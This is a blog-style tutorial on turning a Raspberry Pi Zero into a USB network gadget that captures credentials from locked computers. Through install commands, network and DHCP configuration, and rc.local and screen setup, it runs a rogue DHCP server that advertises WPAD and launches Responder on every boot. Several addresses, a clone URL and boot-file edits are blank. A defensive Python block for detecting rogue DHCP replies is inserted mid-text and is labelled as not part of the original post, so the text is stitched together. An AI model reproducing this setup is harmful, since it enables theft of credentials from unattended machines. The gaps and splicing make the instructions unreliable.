Snagging creds from locked machines with Raspberry Pi Zero

I get really excited anytime I get to use my Raspberry Pi Zero. When I saw Rob Fuller's (@mubix) tweet this morning, I got really excited. Coincidentally, I have a thing for single-board computers and have been playing with the USB Gadget mode for the Pi Zero for the last couple of weeks. As soon as I saw the tweet, I knew I had to do this with the Pi Zero.


  1. Raspberry Pi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD card. I went with the Raspbian-lite version; it's better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
  option routers;
  option local-proxy-config "";
}
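
Seen from the defender's side, the dhcpd.conf above produces DHCP replies with recognisable traits: a server that is not the site's own, option 252 (WPAD), and a 60-second lease. The following is an added example, not code from the original post or from Responder; the trusted-server set, the 300-second threshold, and the sample addresses and URL are constructed assumptions.

```python
import socket

MAGIC_COOKIE = b"\x63\x82\x53\x63"  # start of the DHCP options field (RFC 2131)
OPT_LEASE, OPT_MSGTYPE, OPT_SERVER_ID, OPT_WPAD = 51, 53, 54, 252

def parse_options(payload: bytes) -> dict:
    """Return {option code: raw value} from a BOOTP/DHCP UDP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP payload")
    opts, i = {}, 240
    while i < len(payload) and payload[i] != 255:   # 255 = end option
        if payload[i] == 0:                         # 0 = pad, has no length byte
            i += 1
            continue
        if i + 2 > len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated option")
        code, length = payload[i], payload[i + 1]
        opts[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def audit_reply(payload: bytes, trusted_servers: set, min_lease: int = 300) -> list:
    """Flag traits of a DHCP OFFER/ACK that match the rogue-server setup above."""
    opts = parse_options(payload)
    if opts.get(OPT_MSGTYPE) not in (b"\x02", b"\x05"):   # 2 = OFFER, 5 = ACK
        return []
    findings = []
    server_id = opts.get(OPT_SERVER_ID, b"")
    server = socket.inet_ntoa(server_id) if len(server_id) == 4 else "unknown"
    if server not in trusted_servers:               # trusted set is an assumption
        findings.append("untrusted-server:" + server)
    if OPT_WPAD in opts:                            # option 252 from the config above
        findings.append("wpad-option-252")
    lease = opts.get(OPT_LEASE, b"")
    if len(lease) == 4 and int.from_bytes(lease, "big") < min_lease:
        findings.append("short-lease:%d" % int.from_bytes(lease, "big"))
    return findings

def build_reply(server: str, lease: int, wpad: bytes = None) -> bytes:
    """Constructed sample reply: zeroed BOOTP header plus the options we audit."""
    opts = bytes([OPT_MSGTYPE, 1, 2]) + bytes([OPT_SERVER_ID, 4]) + socket.inet_aton(server)
    opts += bytes([OPT_LEASE, 4]) + lease.to_bytes(4, "big")
    if wpad is not None:
        opts += bytes([OPT_WPAD, len(wpad)]) + wpad
    return bytes([2, 1, 6, 0]) + bytes(232) + MAGIC_COOKIE + opts + b"\xff"

if __name__ == "__main__":
    rogue = build_reply("192.0.2.77", 60, b"http://proxy.example/wpad.dat")
    print(audit_reply(rogue, {"192.0.2.1"}))  # 192.0.2.1: assumed legitimate server
```
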

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

Create the configuration file for screen

Run sudo su, open ~/.screenrc with nano, and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shut down the Pi Zero (shutdown -h now) and remove the Micro SD card. Connect the Micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port into a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016.

Edit config.txt

Add this after the last line:


Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then 



Safely eject the Micro SD card and put it back in the Pi Zero. The device is ready; use the USB OTG cable to connect it to the PC. Happy hacking!